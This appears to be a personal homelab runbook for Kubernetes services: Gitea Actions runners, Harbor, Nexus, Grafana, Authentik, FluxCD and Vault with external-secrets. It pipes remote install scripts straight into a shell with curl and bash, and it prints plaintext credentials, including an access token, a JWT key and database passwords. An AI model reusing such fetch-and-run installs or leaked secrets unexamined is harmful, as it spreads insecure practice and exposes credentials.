kubectl -n gitea exec -it deploy/gitea -c gitea -- gitea actions generate-runner-token
kubectl -n gitea create secret generic gitea-runner-token --from-literal=token=$TOKEN

kubectl label --overwrite namespace gitea \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest

# kubectl -n gitea logs gitea-actions-act-runner-0 -c act-runner

kubectl -n gitea patch deployment gitea \
--type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-root-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "ca-store",
      "emptyDir": {}
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/0/volumeMounts/-",
    "value": {
      "name": "ca-store",
      "mountPath": "/etc/ssl/certs/"
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/initContainers/-",
    "value": {
      "name": "build-ca",
      "image": "docker.io/fluxcd/flux:1.17.0",
      "imagePullPolicy": "IfNotPresent",
      "command": ["/usr/sbin/update-ca-certificates"],
      "volumeMounts": [
        {
          "mountPath": "/usr/local/share/ca-certificates/",
          "name": "internal-root-ca",
          "readOnly": true
        },
        {
          "mountPath": "/etc/ssl/certs/",
          "name": "ca-store"
        }
      ]
    }
  }
]'

# now add the CA on the nodes so that initContainers can use the custom CA. This allows initContainers that pull from the harbor.aperture.ad/gitea repo to validate harbor's self-signed cert
# I had to reboot all talos nodes for this to take effect.
cat talos-ca.yaml
# apiVersion: v1alpha1
# kind: TrustedRootsConfig
# name: custom-ca
# certificates: |-
#   -----BEGIN CERTIFICATE-----
#   ...
#   -----END CERTIFICATE-----
talosctl patch mc --nodes 192.168.88.245,192.168.88.244,192.168.88.243,192.168.88.242 --patch @talos-ca.yaml

# add the CA to the runner container so that it can verify the gitea instance
# Make sure to mount /etc/ssl/certs/ into both containers (including dind), because the "valid_volumes" option from the gitea act runner config fetches volumes from the dind container
kubectl -n gitea patch statefulset gitea-actions-act-runner \
--type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-root-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "ca-store",
      "emptyDir": {}
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/0/volumeMounts/-",
    "value": {
      "name": "ca-store",
      "mountPath": "/etc/ssl/certs/"
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/1/volumeMounts/-",
    "value": {
      "name": "ca-store",
      "mountPath": "/etc/ssl/certs/"
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/initContainers/-",
    "value": {
      "name": "build-ca",
      "image": "docker.io/fluxcd/flux:1.17.0",
      "imagePullPolicy": "IfNotPresent",
      "command": ["/usr/sbin/update-ca-certificates"],
      "volumeMounts": [
        {
          "mountPath": "/usr/local/share/ca-certificates/",
          "name": "internal-root-ca",
          "readOnly": true
        },
        {
          "mountPath": "/etc/ssl/certs/",
          "name": "ca-store"
        }
      ]
    }
  }
]'

# reload
kubectl -n gitea delete pod gitea-actions-act-runner-0

Wish to reset? Delete the actions-runner PVC, and don't forget to patch the statefulset again so the runner gets the certificate (then delete the pod).

If you're getting the following errors:

level=info msg="Registering runner, arch=amd64, os=linux, version=v0.2.13."
Error: parse config file "/actrunner/config.yaml": yaml: unmarshal errors:
line 12: mapping key "options" already defined at line 6
Waiting to retry ...

then fix your config file
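The yaml unmarshal error above means a mapping key is duplicated: here, options appears twice under container: (which easily happens when merging the example config with your own additions). A sketch of broken vs fixed:

```yaml
# broken: "options" defined twice under container:
container:
  options: "-e 'DOCKER_TLS_VERIFY=1'"
  network: "host"
  options: "--volume /etc/ssl/certs:/etc/ssl/certs:ro"

# fixed: merge everything into a single "options" key
container:
  network: "host"
  options: "-e 'DOCKER_TLS_VERIFY=1' --volume /etc/ssl/certs:/etc/ssl/certs:ro"
```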

Harbor:

  1. Add a “Docker Hub” repository called docker-hub-proxy
  2. Add a new project with name=gitea, access_level=public and proxy=true,docker-hub-proxy
  3. Create a regular user account for gitea
  4. Go to project you created -> Members -> + User -> gitea (admin)

dind is a separate container that runs a docker daemon and exposes the docker TCP socket to the act_runner container. The act_runner container is responsible for communicating with gitea, while dind is responsible for running the CI containers. The dind container needs to be privileged, because dockerd relies on kernel features such as cgroups to function properly
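Schematically, the runner pod looks like this (a simplified sketch, not the chart's exact manifest):

```yaml
containers:
- name: act-runner            # talks to gitea, schedules CI jobs
  env:
  - name: DOCKER_HOST         # points at the dind sidecar's TCP socket
    value: tcp://127.0.0.1:2376
- name: dind                  # runs the actual CI containers
  image: docker:dind
  securityContext:
    privileged: true          # dockerd needs cgroups etc.
```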

If you exec into the main container using kubectl -n gitea exec -it pod/gitea-actions-act-runner-0 -- /bin/bash and inspect its env vars, you'll see that it uses DOCKER_HOST=tcp://127.0.0.1:2376, a socket served by its dind sidecar container.

For buildx jobs to run successfully, the CI container must be able to connect to the docker daemon. To do that, its default DOCKER_HOST value (unix:///var/run/docker.sock) must be overridden to point at dind's docker TCP socket (localhost:2376 when network=host). To establish a secure connection we also need to give the buildx job a path to client certificates. We cannot mount the contents of dind's /certs/server directory into CI containers, because that directory contains the server key.

dockerd on the remote host is started with the following server-side arguments: --tlsverify --tlscacert /certs/server/ca.pem --tlscert /certs/server/cert.pem --tlskey /certs/server/key.pem. You can see them by exec-ing into the dind container (kubectl -n gitea exec -it pod/gitea-actions-act-runner-0 -c dind -- ps auxf) and checking which arguments dockerd is running with.

To pass the correct TLS credentials to the docker buildx client, we would theoretically need to generate client certs with an initContainer and then mount the output directory into the CI container using the --volume argument. Fortunately the first step (generating the certs) has already been done for us: they live in the /certs/client directory on the dind host. Buildx looks for certificates in /certs/server (because I set DOCKER_CERT_PATH to /certs/server) rather than /certs/client, which is why we mount them as follows: --volume /certs/client:/certs/server:ro

When I first deployed the container, the CI container had no internet connection. I initially suspected an MTU mismatch between the node interface eth0 and the docker0 interface DinD uses to launch CI containers, but that wasn't the problem. The real problem was that the network: "host" parameter I specified in the gitea-actions-act-runner configuration is only applied to the main runner image (e.g. docker.gitea.com/runner-images:ubuntu-latest). Here's what the DinD container looks like while running a pipeline containing buildx jobs:

docker container ps --all --no-trunc
# CONTAINER ID                                                       IMAGE                                          COMMAND                                                                                                CREATED          STATUS          PORTS     NAMES
# 97fda5bdc9ca06b88a314a5680b54b70f7228fbe8c8ee7fa6364f87f24ddcf4c   moby/buildkit:buildx-stable-1                  "buildkitd --allow-insecure-entitlement security.insecure --allow-insecure-entitlement network.host"   34 seconds ago   Up 33 seconds             buildx_buildkit_builder-2b8aa5f9-c26e-44af-bcac-cab07d69add20
# bd39d69c97b12e201cd5ad9dadce704c68a9ba9ab35f7a8e48f9936391e0f6f8   docker.gitea.com/runner-images:ubuntu-latest   "/bin/sleep 10800"                                                                                     40 seconds ago   Up 40 seconds             GITEA-ACTIONS-TASK-121_WORKFLOW-Build-and-Push-Docker-Image_JOB-build

This all means that a job such as run: docker build ... (which runs inside the main runner container, runner-images) picks up all the variables and options we passed to gitea-actions-act-runner in its helm values, but jobs that create their own separate container (such as docker/setup-buildx-action) know nothing about those options (so their network will not be the host’s). This is why you need to add the network=host option when running buildx jobs. The same goes for certificates: since our internal root CA certificate only exists inside the bundled /etc/ssl/certs/ca-certificates.crt file rather than as a separate file, we need to mount it into dind separately:

kubectl -n gitea patch statefulset gitea-actions-act-runner --type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/1/volumeMounts/-",
    "value": {
      "name": "internal-ca",
      "mountPath": "/etc/ssl/certs/internal-ca.crt",
      "subPath": "ca.crt",
      "readOnly": true
    }
  }
]'
Then reference the mounted CA in the buildx setup step:

  - name: Set up Docker Buildx
    uses: docker/setup-buildx-action@v3
    with:
      driver-opts: |
        network=host
      config-inline: |
        [registry."harbor.aperture.ad"]
          ca=["/etc/ssl/certs/internal-ca.crt"]

migrate from valkey-cluster to valkey

I was getting segfault crashes on my valkey-cluster pods, so I migrated to standalone valkey:

helm upgrade --install gitea gitea-charts/gitea \
--namespace gitea \
--set postgresql-ha.enabled=false \
--set postgresql.enabled=true \
--set persistence.storageClass='rook-ceph-block' \
--set postgresql.primary.persistence.storageClass='rook-ceph-block' \
--set gitea.config.server.ROOT_URL=https://gitea.aperture.ad/ \
--set valkey-cluster.enabled=false \
--set valkey.enabled=true \
--set valkey.persistence.storageClass='rook-ceph-block'

Monitoring

Prometheus & Grafana

Setup

kubectl create namespace monitoring
kubectl label namespace monitoring istio-injection=enabled
kubectl label --overwrite namespace monitoring \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest

helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm install prometheus prometheus-community/prometheus --namespace monitoring

helm repo add grafana https://grafana.github.io/helm-charts
helm install grafana grafana/grafana \
--namespace monitoring \
--set persistence.enabled=true

kubectl apply -f grafana-ingress.yaml

# get passwd
kubectl get secret --namespace monitoring grafana -o jsonpath="{.data.admin-password}" | base64 --decode ; echo

Log in as admin with the password obtained above. Add the node exporter dashboard, and add a Prometheus data source pointing to http://prometheus-server.monitoring.svc.cluster.local

Grafana’s Authentik integration requires modifying values.yaml, so I will follow the Authentik docs to update the deployment:

kubectl create secret generic grafana-authentik-secret -n monitoring --from-literal=client_secret='REDACTED'

# we will make grafana use the root CA so that it trusts authentik
kubectl label namespace monitoring use-internal-ca=true
kubectl -n monitoring edit deployment grafana
# spec:
#   template:
#     spec:
#       volumes:
#         - name: internal-ca
#           configMap:
#             name: internal-root-ca
#       containers:
#         - env:
#           name: grafana
#           volumeMounts:
#             - name: internal-ca
#               mountPath: /etc/ssl/certs/internal-ca.crt
#               subPath: ca.crt
#               readOnly: true

# as grafana is behind istio, we have to specify root_url, otherwise it redirects to localhost:3000
nvim grafana-values.yaml
# grafana.ini:
#   server:
#     root_url: https://grafana.aperture.ad
#   auth:
#     signout_redirect_url: "https://authentik.aperture.ad/application/o/grafana/end-session/"
#     oauth_auto_login: false
#   auth.generic_oauth:
#     name: authentik
#     enabled: true
#     client_id: "TiLrd2FQwovZOYfHdIm2DLk3i2QVQeXWjaYd4nW9"
#     client_secret: $__file{/etc/secrets/authentik/client_secret}
#     scopes: "openid profile email"
#     auth_url: "https://authentik.aperture.ad/application/o/authorize/"
#     token_url: "https://authentik.aperture.ad/application/o/token/"
#     api_url: "https://authentik.aperture.ad/application/o/userinfo/"
# 
# extraSecretMounts:
#   - name: authentik-secret
#     secretName: grafana-authentik-secret
#     mountPath: /etc/secrets/authentik
#     readOnly: true
# extraConfigmapMounts:
#   - name: internal-ca
#     configMap: internal-root-ca
#     mountPath: /etc/ssl/certs/internal-ca.crt
#     subPath: ca.crt
#     readOnly: true

helm upgrade grafana grafana/grafana -n monitoring --set persistence.enabled=true -f grafana-values.yaml

CD

FluxCD

Setup

Gitea integration

The bootstrap command creates the kustomization repository and installs the flux operator into kubernetes under the flux-system namespace. Note: if you want to uninstall flux, just run flux uninstall

# install fluxcd CLI
curl -s https://fluxcd.io/install.sh | sudo bash

# Settings -> Applications -> Create token
# Also, for some reason I first had to create it using --insecure-skip-tls-verify, but then recreated it
flux bootstrap gitea \
--token-auth \
--owner=alex.dvorak \
--repository=flux-kustomization-repo \
--branch=main \
--path=clusters/aperture \
--personal \
--hostname gitea.aperture.ad \
--certificate-authority $PATH_TO_API_SERVER_CERT \
--ca-file $PATH_TO_GITEA_CERT
# Please enter your Gitea personal access token (PAT): 0f2cbf55fb1cb8f47209aca6923d21025bf8c141

git clone https://$USER:$PAT@gitea.aperture.ad/$USER/flux-kustomization-repo
cd flux-kustomization-repo

# create an application source
flux create source git gfub \
--url=https://gitea.aperture.ad/alex.dvorak/GFUB \
--branch=main \
--interval=1m \
--export > ./clusters/aperture/gfub-source.yaml

git add -A && git commit -m "Add GFUB GitRepository" && git push

# make sure names match (name of git source "gfub" and --source "gfub")
flux create kustomization gfub \
--target-namespace=gfub \
--source=gfub \
--path="./kustomize" \
--prune=true \
--wait=true \
--interval=30m \
--retry-interval=2m \
--health-check-timeout=3m \
--export > ./clusters/aperture/gfub-kustomization.yaml

git add -A && git commit -m "Add GFUB Kustomization" && git push

FluxCD will reset all labels and modifications made to deployments and other resources, so in order to add our CA to its containers we must patch them through flux itself. The resources are contained within fluxcd’s gotk-components.yaml file, which holds the Namespace and Deployment definitions and the CRDs. To patch it we need to define a kustomization: https://fluxcd.io/flux/installation/configuration/bootstrap-customization/

apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
  - gotk-components.yaml
  - gotk-sync.yaml
patches:
  - patch: |
      - op: add
        path: /metadata/labels/use-internal-ca
        value: "true"
    target:
      kind: Namespace
      labelSelector: "app.kubernetes.io/part-of=flux"

  - patch: |
      - op: add
        path: /spec/template/spec/volumes/-
        value:
          name: internal-root-ca
          configMap:
            name: internal-root-ca

      - op: add
        path: /spec/template/spec/volumes/-
        value:
          name: ca-store
          emptyDir: {}

      - op: add
        path: /spec/template/spec/containers/0/volumeMounts/-
        value:
          name: ca-store
          mountPath: /etc/ssl/certs/

      - op: add
        path: /spec/template/spec/initContainers
        value: []

      - op: add
        path: /spec/template/spec/initContainers/-
        value:
          name: build-ca
          image: docker.io/fluxcd/flux:1.17.0
          imagePullPolicy: IfNotPresent
          command:
            - /usr/sbin/update-ca-certificates
          volumeMounts:
            - mountPath: /usr/local/share/ca-certificates/
              name: internal-root-ca
              readOnly: true
            - mountPath: /etc/ssl/certs/
              name: ca-store
    target:
      kind: Deployment
      name: "source-controller"
git add -A && git commit -m "modify resources" && git push

# wait
flux get kustomizations --watch

Now we get kustomization path not found: stat /tmp/kustomization-393043959/kustomize: no such file or directory. This is because we set the ./kustomize path, so flux expects the manifests to live at that path inside our GFUB repository in order to deploy the project to kubernetes.
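For reference, the minimal layout flux looks for is a kustomization.yaml under ./kustomize that lists the project manifests (a sketch; the manifest file names are hypothetical):

```shell
# demo in a throwaway dir; in practice run this from the GFUB repo root
cd "$(mktemp -d)"
mkdir -p kustomize
cat > kustomize/kustomization.yaml <<'EOF'
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
  - deployment.yaml
  - service.yaml
EOF
```

Commit and push this directory to the GFUB repository, and the Kustomization reconciles on the next interval.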

IdP

Authentik

Setup with gitea

nvim authentik-values.yaml
# authentik:
#   secret_key: "somekey"
#   # This sends anonymous usage-data, stack traces on errors and
#   # performance data to sentry.io, and is fully opt-in
#   error_reporting:
#     enabled: true
#   postgresql:
#     password: "somepass"
# 
# postgresql:
#   enabled: true
#   auth:
#     password: "somepass"
# redis:
#   enabled: true

helm upgrade --install authentik authentik/authentik \
--namespace authentik \
-f authentik-values.yaml

nvim authentik-ingress.yaml
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: authentik-gateway
#   namespace: authentik
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "authentik.aperture.ad"
#       tls:
#         httpsRedirect: true
#     - port:
#         number: 443
#         name: https
#         protocol: HTTPS
#       hosts:
#         - "authentik.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: authentik-tls
# ---
# apiVersion: networking.istio.io/v1beta1
# kind: VirtualService
# metadata:
#   name: authentik
#   namespace: authentik
# spec:
#   hosts:
#     - "authentik.aperture.ad"
#   gateways:
#     - authentik-gateway
#   http:
#     - match:
#         - uri:
#             prefix: /
#       route:
#         - destination:
#             host: authentik.svc.cluster.local
#             port:
#               number: 80
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: authentik-cert
#   namespace: istio-system
# spec:
#   secretName: authentik-tls
#   issuerRef:
#     name: internal-ca-issuer
#     kind: ClusterIssuer
#   commonName: authentik.aperture.ad
#   dnsNames:
#     - authentik.aperture.ad


kubectl apply -f authentik-ingress.yaml

Access authentik by navigating to https://authentik.aperture.ad/if/flow/initial-setup/. Add a gitea provider and a gitea application, then assign the provider to the application.

Registries

Harbor

Setup

kubectl create namespace harbor
kubectl label namespace harbor istio-injection=enabled

# add the official harbor chart repo
helm repo add harbor https://helm.goharbor.io

helm upgrade --namespace harbor --install harbor harbor/harbor --set expose.type=clusterIP --set expose.clusterIP.name=harbor --set expose.tls.enabled=false --set externalURL=https://harbor.aperture.ad

cat harbor-ingress.yaml
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: harbor-gateway
#   namespace: harbor
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "harbor.aperture.ad"
#       tls:
#         httpsRedirect: true
#     - port:
#         number: 443
#         name: https
#         protocol: HTTPS
#       hosts:
#         - "harbor.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: harbor-tls
# ---
# apiVersion: networking.istio.io/v1beta1
# kind: VirtualService
# metadata:
#   name: harbor
#   namespace: harbor
# spec:
#   hosts:
#     - "harbor.aperture.ad"
#   gateways:
#     - harbor-gateway
#   http:
#     - match:
#         - port: 443
#           uri:
#             prefix: /
#       route:
#         - destination:
#             host: harbor.harbor.svc.cluster.local
#             port:
#               number: 80
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: harbor-cert
#   namespace: istio-system
# spec:
#   secretName: harbor-tls
#   issuerRef:
#     name: internal-ca-issuer
#     kind: ClusterIssuer
#   commonName: harbor.aperture.ad
#   dnsNames:
#     - harbor.aperture.ad

kubectl apply -f harbor-ingress.yaml

docker login https://harbor.aperture.ad
# Username: admin
# Password:

Nexus

Setup

Port 8384 is an additional HTTPS port for Docker

kubectl create namespace nexus
kubectl label namespace nexus istio-injection=enabled

helm repo add sonatype https://sonatype.github.io/helm3-charts/
helm upgrade --install --namespace nexus nexus-repo sonatype/nexus-repository-manager

nvim nexus-ingress.yaml
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: nexus-gateway
#   namespace: nexus
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "nexus.aperture.ad"
#       tls:
#         httpsRedirect: true
#     - port:
#         number: 443
#         name: https
#         protocol: HTTPS
#       hosts:
#         - "nexus.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: nexus-tls
#     - port:
#         number: 8384
#         name: https-8384
#         protocol: HTTPS
#       hosts:
#         - "nexus.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: nexus-tls
# ---
# apiVersion: networking.istio.io/v1beta1
# kind: VirtualService
# metadata:
#   name: nexus
#   namespace: nexus
# spec:
#   hosts:
#     - "nexus.aperture.ad"
#   gateways:
#     - nexus-gateway
#   http:
#     - match:
#         - port: 443
#           uri:
#             prefix: /
#       route:
#         - destination:
#             host: nexus-repo-nexus-repository-manager.nexus.svc.cluster.local
#             port:
#               number: 8081
#     - match:
#         - port: 8384
#           uri:
#             prefix: /
#       route:
#         - destination:
#             host: nexus-repo-nexus-repository-manager.nexus.svc.cluster.local
#             port:
#               number: 8384
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: nexus-cert
#   namespace: istio-system
# spec:
#   secretName: nexus-tls
#   issuerRef:
#     name: internal-ca-issuer
#     kind: ClusterIssuer
#   commonName: nexus.aperture.ad
#   dnsNames:
#     - nexus.aperture.ad


kubectl apply -f nexus-ingress.yaml

kubectl -n nexus patch service nexus-repo-nexus-repository-manager \
--type='json' -p='[{"op": "replace", "path": "/spec/ports/0/name", "value": "http-nexus"}]'

kubectl -n istio-system patch svc istio-ingressgateway --type='json' -p='[
  {
    "op": "add",
    "path": "/spec/ports/-",
    "value": {
      "name": "https-8384",
      "port": 8384,
      "targetPort": 8384,
      "protocol": "TCP"
    }
  }
]'

kubectl -n nexus patch svc nexus-repo-nexus-repository-manager --type='json' -p='[
  {
    "op": "add",
    "path": "/spec/ports/-",
    "value": {
      "name": "https-8384",
      "port": 8384,
      "targetPort": 8384,
      "protocol": "TCP"
    }
  }
]'

kubectl -n nexus exec -it pod/nexus-repo-nexus-repository-manager-55b69ddd87-nlxth -- cat /nexus-data/admin.password

Secrets Management

Vault

Setup

Integrate with K8s

# enable (create) a new KV (v2) secrets engine at the k8s/ path; secrets will live under k8s/prod/gfub
vault secrets enable -path=k8s -version=2 kv

# store secrets (store in batch, each `put` does an override)
vault kv put k8s/prod/gfub/atsvc \
JWT_SECRET_KEY="da0a56e4c80c7aa7f93aad7452efdec2f759f915xl38dan" \
DATABASE_PASSWORD="sohd801h08h10fhv1" \
APPLICATION_URL="https://atsvc.com" \
SPRING_PROFILES_ACTIVE="dev" \
DATABASE_USERNAME="admin" \
DATABASE_URL="jdbc:postgresql://db:5432/atsvc" \
REDIS_HOST="redis" \
REDIS_PORT="6379" \
POSTGRES_USER="admin" \
POSTGRES_PASSWORD="sohd801h08h10fhv1" \
POSTGRES_DB="atsvc"

# verify
vault kv get k8s/prod/gfub/atsvc

Install external secrets

helm repo add external-secrets https://charts.external-secrets.io
helm repo update

helm install external-secrets external-secrets/external-secrets \
--namespace external-secrets \
--create-namespace

Note: the ExternalSecret specifies what to fetch; the SecretStore specifies how to access it. https://external-secrets.io/main/api/externalsecret/ https://external-secrets.io/main/api/secretstore/

cat external-secrets.yaml
# ---
# apiVersion: external-secrets.io/v1
# kind: SecretStore
# metadata:
#   name: vault-backend
# spec:
#   provider:
#     vault:
#       server: "https://vault.aperture.ad:8200"
#       path: k8s #?
#       version: v2
#       auth:
#         tokenSecretRef:
#           name: vault-token
#           namespace: gfub
#           key: token
#       caProvider:
#         type: ConfigMap
#         name: internal-root-ca
#         key: "ca.crt"
# ---
# apiVersion: external-secrets.io/v1
# kind: ExternalSecret
# metadata:
#   name: prod-gfub
#   namespace: gfub
# spec:
#   refreshInterval: 1m
#   secretStoreRef:
#     name: vault-backend
#     kind: SecretStore
#   target:
#     name: prod-gfub
#   data:
#     - secretKey: JWT_SECRET_KEY
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: JWT_SECRET_KEY
#     - secretKey: DATABASE_PASSWORD
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: DATABASE_PASSWORD
#     - secretKey: APPLICATION_URL
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: APPLICATION_URL
#     - secretKey: SPRING_PROFILES_ACTIVE
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: SPRING_PROFILES_ACTIVE
#     - secretKey: DATABASE_USERNAME
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: DATABASE_USERNAME
#     - secretKey: DATABASE_URL
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: DATABASE_URL
#     - secretKey: REDIS_HOST
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: REDIS_HOST
#     - secretKey: REDIS_PORT
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: REDIS_PORT
#     - secretKey: POSTGRES_USER
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: POSTGRES_USER
#     - secretKey: POSTGRES_PASSWORD
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: POSTGRES_PASSWORD
#     - secretKey: POSTGRES_DB
#       remoteRef:
#         key: prod/gfub/atsvc
#         property: POSTGRES_DB
kubectl create namespace gfub

cat ./gfub-policy.hcl
# path "k8s/data/prod/gfub/atsvc" {
#   capabilities = ["read", "list"]
# }
#
# path "k8s/metadata/prod/gfub/atsvc" {
#   capabilities = ["read", "list"]
# }

vault policy write gfub-policy ./gfub-policy.hcl

vault token create -policy=gfub-policy -period=0 -orphan
# token: $TOKEN

kubectl create secret generic vault-token --namespace gfub --from-literal=token="$TOKEN"

kubectl apply -f ./external-secrets.yaml
kubectl label namespace gfub use-internal-ca=true

# verify
kubectl -n gfub get externalsecret
kubectl -n gfub get secret

Fix certificate issues when external-secrets operator tries to connect to vault:

kubectl label namespace external-secrets use-internal-ca=true

Configure secret for kubernetes to be able to pull image from private harbor repo and allow default SA to use that secret:

kubectl create secret docker-registry reg-token --docker-server=https://harbor.aperture.ad/ --docker-username=kubernetes --docker-password="coolpasswd" --docker-email="kubernetes@aperture.ad"
kubectl patch serviceaccount default -p '{"imagePullSecrets": [{"name": "reg-token"}]}'

Setup on Proxmox

Install Hashicorp Vault on an external server. I will use the community Proxmox script to deploy a Docker LXC: https://community-scripts.github.io/ProxmoxVE/scripts?id=docker&category=Containers+%26+Docker

export $(grep -v '^#' .env | xargs)
ssh -i $TF_VAR_pve_ssh_key_path root@pve.aperture.ad

bash -c "$(curl -fsSL https://raw.githubusercontent.com/community-scripts/ProxmoxVE/main/ct/docker.sh)"
# select advanced install, choose root passwd and configure ssh key
# add compose plugin
# ......... installation completed
exit

I will now generate certs for vault on my workstation:

openssl genrsa -out vault.aperture.ad.key 4096

cat > vault.aperture.ad.cnf <<EOF
[req]
default_bits = 4096
prompt = no
default_md = sha256
distinguished_name = dn
req_extensions = req_ext

[dn]
CN = vault.aperture.ad

[req_ext]
subjectAltName = @san

[san]
DNS.1 = vault.aperture.ad
EOF

# on WS
openssl req -new \
-key vault.aperture.ad.key \
-out vault.aperture.ad.csr \
-config vault.aperture.ad.cnf

openssl x509 -req \
-in vault.aperture.ad.csr \
-CA k8s-aperture-root-ca.crt \
-CAkey k8s-aperture-root-ca.key \
-CAcreateserial \
-out vault.aperture.ad.crt \
-days 825 \
-sha256 \
-extensions req_ext \
-extfile vault.aperture.ad.cnf

sftp -i vault root@vault.aperture.ad
> put certificates/vault.aperture.ad.crt /root/vault/certs/server.crt
> put certificates/vault.aperture.ad.key /root/vault/certs/server.key
> put certificates/k8s-aperture-root-ca-01.crt /usr/local/share/ca-certificates/

After the docker LXC installation, exit the proxmox ssh session and ssh into the docker LXC.

update-ca-certificates

mkdir -p $HOME/vault/{config,file,logs,certs}
cd $HOME/vault/certs/

cd $HOME/vault
cat <<EOF > docker-compose.yaml
version: '3.3'
services:
  vault:
    image: hashicorp/vault
    container_name: vault-new
    environment:
      VAULT_ADDR: "https://vault.aperture.ad:8200"
      VAULT_API_ADDR: "https://vault.aperture.ad:8200"
      VAULT_ADDRESS: "https://vault.aperture.ad:8200"
      # VAULT_UI: true
      # VAULT_TOKEN:
    ports:
      - "8200:8200"
      - "8201:8201"
    restart: always
    volumes:
      - ./logs:/vault/logs/:rw
      - ./data:/vault/data/:rw
      - ./config:/vault/config/:rw
      - ./certs:/certs/:rw
      - ./file:/vault/file/:rw
    cap_add:
      - IPC_LOCK
    entrypoint: vault server -config /vault/config/config.hcl
EOF

cd $HOME/vault/config
cat <<EOF > config.hcl
ui = true
disable_mlock = "true"

storage "raft" {
  path    = "/vault/data"
  node_id = "node1"
}

listener "tcp" {
  address = "[::]:8200"
  tls_disable = "false"
  tls_cert_file = "/certs/server.crt"
  tls_key_file  = "/certs/server.key"
}

api_addr = "https://vault.aperture.ad:8200"
cluster_addr = "https://vault.aperture.ad:8201"
EOF

cd $HOME/vault
docker compose up -d

# Exec into the vault container
docker exec -it vault-new /bin/sh

# Once logged into the vault container
vault operator init
# store the unseal keys and the token outputted

# run the following in the container, entering 3 different unseal keys
vault operator unseal
vault operator unseal
vault operator unseal

# install vault on your workstation
export VAULT_ADDR="https://vault.aperture.ad:8200"
vault login
# Token (will be hidden):

IDE & git

git

ambiguous ref fix

# list refs
git show-ref master
# 15b28ec22dfb072ff4369b35ef18df51bb55e900 refs/heads/master
# 15b28ec22dfb072ff4369b35ef18df51bb55e900 refs/origin/master
# 15b28ec22dfb072ff4369b35ef18df51bb55e900 refs/remotes/origin/HEAD
# 15b28ec22dfb072ff4369b35ef18df51bb55e900 refs/remotes/origin/master
### ^^^ how it should normally look

# delete a weird ref locally if you see one
git update-ref -d refs/remotes/origin/origin/origin/master

# delete weird ref remotely
git push origin --all --prune
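A self-contained reproduction of such a stray nested ref and the local fix (throwaway repository; the identity values are placeholders):

```shell
set -e
cd "$(mktemp -d)"
git init -q -b master
git config user.email demo@example.com
git config user.name demo
git commit -q --allow-empty -m 'initial'

# manufacture a bogus nested remote-tracking ref
git update-ref refs/remotes/origin/origin/master HEAD
git show-ref master
# (lists refs/heads/master plus the stray refs/remotes/origin/origin/master)

# delete the stray ref locally
git update-ref -d refs/remotes/origin/origin/master
! git show-ref | grep -q 'origin/origin'   # gone
```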

create orphan repo

git checkout --orphan main
git add . && git commit -m 'initial'
git push origin main

merge from development branch without commit history

# switch to master
git checkout master
# merge without commit history
git merge --squash dev
git commit --all -m 'commit'
git push origin master

merge without merge commit

# create feature branch
git checkout -b feature/foo master

# make some commits

# rebase current feature branch to match master's commit history
git rebase master

# switch to master
git checkout master

# merge only fast-forward commits
git merge --ff-only feature/foo
### in order to merge without commit history at all use --squash
git merge --squash feature/foo

# -d (safe delete) ensure only fully merged branches are deleted
git branch -d feature/foo
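The flow above can be exercised end-to-end in a throwaway repository (all names and identities below are placeholders):

```shell
set -e
cd "$(mktemp -d)"
git init -q -b master
git config user.email demo@example.com
git config user.name demo
echo base > file.txt
git add file.txt && git commit -qm 'base'

# feature branch with one commit
git checkout -qb feature/foo
echo feature >> file.txt
git commit -qam 'feature work'

# meanwhile master moves forward
git checkout -q master
echo other > other.txt
git add other.txt && git commit -qm 'master work'

# replay feature on top of master, then fast-forward merge
git checkout -q feature/foo
git rebase -q master
git checkout -q master
git merge --ff-only -q feature/foo

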